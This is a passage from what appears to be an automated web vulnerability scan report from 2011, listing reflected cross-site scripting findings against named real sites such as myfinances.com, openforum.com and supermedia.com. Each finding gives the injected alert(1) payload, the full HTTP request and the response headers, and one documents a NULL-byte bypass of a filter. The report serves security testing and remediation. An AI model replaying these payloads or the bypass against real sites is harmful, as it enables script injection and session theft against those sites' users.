Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:54 GMT
Content-Length: 13663
Connection: close
Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Choose Between a Traditional 401(K) and a Roth 401(K)' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299553.html?f745d"><script>alert(1)</script>799a50af86f=1'"> ...[SNIP]...
1.495. http://www.myfinances.com/budget.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.myfinances.com
Path: /budget.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91d41"><script>alert(1)</script>3d8e0c43e90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /budget.php?91d41"><script>alert(1)</script>3d8e0c43e90=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:55:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:55:20 GMT
Content-Length: 21653
Connection: close
Set-Cookie: ARPT=VRWOZXS192.168.100.28CKOUU; path=/
Set-Cookie: PHPSESSID=r5fgdi9rsbvhrv1uang897d6f7; path=/
Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;
The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e9843'><script>alert(1)</script>2707c201b22 was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /budget.php?query=savings+accountse9843'><script>alert(1)</script>2707c201b22&mfid=mf-4d404e8fe4f0d&mfs=adwc&&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:55:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:55:41 GMT
Content-Length: 19651
Connection: close
Set-Cookie: ARPT=VRWOZXS192.168.100.28CKOUU; path=/
Set-Cookie: PHPSESSID=8mri1qtefnba9k49k4ep3nl8h2; path=/
Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload a2ce6<script>alert(1)</script>826352099bb was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /budget.php?query=savings+accountsa2ce6<script>alert(1)</script>826352099bb&mfid=mf-4d404e8fe4f0d&mfs=adwc&&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:55:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:55:45 GMT
Content-Length: 19629
Connection: close
Set-Cookie: ARPT=VRWOZXS192.168.100.26CKOUQ; path=/
Set-Cookie: PHPSESSID=u15624i2oae1adjjrl0fa5mn65; path=/
Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;
1.498. http://www.myfinances.com/contact.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.myfinances.com
Path: /contact.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 613cb'><script>alert(1)</script>8f2541e63ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact.html?613cb'><script>alert(1)</script>8f2541e63ae=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:02:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:02:44 GMT
Content-Length: 8051
Connection: close
Set-Cookie: adc=RSP; path=/;
1.499. http://www.openforum.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.openforum.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54350'-alert(1)-'b64566be317 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?54350'-alert(1)-'b64566be317=1 HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Thu, 03 Feb 2011 13:50:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2735450304.20480.0000; path=/
Content-Length: 102188
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4b2f'-alert(1)-'731207dc1c was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cid=inav_homea4b2f'-alert(1)-'731207dc1c&inav=menu_business_openforum HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2785781952.20480.0000; path=/
Content-Length: 102363
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the inav request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1db04'-alert(1)-'749ae354a20 was submitted in the inav parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cid=inav_home&inav=menu_business_openforum1db04'-alert(1)-'749ae354a20 HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2819336384.20480.0000; path=/
Content-Length: 102377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
1.502. https://www.openforum.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.openforum.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a374f'-alert(1)-'7289baab9b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?a374f'-alert(1)-'7289baab9b9=1 HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2836113600.20480.0000; path=/
Content-Length: 102556
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aac2e"%3balert(1)//8d034beed23 was submitted in the campaignId parameter. This input was echoed as aac2e";alert(1)//8d034beed23 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-listings?tsrc=SP&campaignId=SP_FT_AddEditaBusinessaac2e"%3balert(1)//8d034beed23 HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;
Response
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:16:53 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Get Your Free Business Listing | SuperMedia.com Advertising</title>
The value of the tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20b9c"%3balert(1)//623d3053168 was submitted in the tsrc parameter. This input was echoed as 20b9c";alert(1)//623d3053168 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-listings?tsrc=SP20b9c"%3balert(1)//623d3053168&campaignId=SP_FT_AddEditaBusiness HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;
Response
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:16:48 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Get Your Free Business Listing | SuperMedia.com Advertising</title>
The value of the &tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 198c8"%3balert(1)//96cb9badcf2 was submitted in the &tsrc parameter. This input was echoed as 198c8";alert(1)//96cb9badcf2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-listings/business-profile?&tsrc=SP198c8"%3balert(1)//96cb9badcf2&campaignId=BP:Update+Your+Profile+Top HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 17:05:34 GMT
Set-Cookie: JSESSIONID=B9B8A68CD261E7EEF56BA494FDEE7747.app3-a1; Path=/
Set-Cookie: trafficSource="SP198c8\";alert(1)//96cb9badcf2"; Expires=Sat, 05-Mar-2011 17:05:33 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 17:05:33 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Your Business Profile | SuperMedia.com Advertising</title>
The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d7a"%3balert(1)//5f4e0e8915 was submitted in the campaignId parameter. This input was echoed as b7d7a";alert(1)//5f4e0e8915 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-listings/business-profile?&tsrc=SP&campaignId=BP:Update+Your+Profile+Topb7d7a"%3balert(1)//5f4e0e8915 HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 17:05:45 GMT Set-Cookie: JSESSIONID=63B1953F08BCF0514CDCD4855AE3E1E8.app7-a1; Path=/ Set-Cookie: trafficSource=SP; Expires=Sat, 05-Mar-2011 17:05:41 GMT; Path=/ Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 17:05:41 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Your Business Profile | SuperMedia.com Advertising</title>
The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00647f4"%3balert(1)//acd0e29ec22 was submitted in the campaignId parameter. This input was echoed as 647f4";alert(1)//acd0e29ec22 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /business-listings/business-profile?&tsrc=SP&campaignId=BP:Update+Your+Profile+Top%00647f4"%3balert(1)//acd0e29ec22 HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:16:48 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Your Business Profile | SuperMedia.com Advertising</title>
The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f17b"%3balert(1)//351308f1023 was submitted in the campaignId parameter. This input was echoed as 6f17b";alert(1)//351308f1023 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online-advertising?tsrc=SP&campaignId=SP_FT_AdvertiseWithUs6f17b"%3balert(1)//351308f1023 HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:16:33 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
The value of the tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9e22"%3balert(1)//51aaefb74c6 was submitted in the tsrc parameter. This input was echoed as b9e22";alert(1)//51aaefb74c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
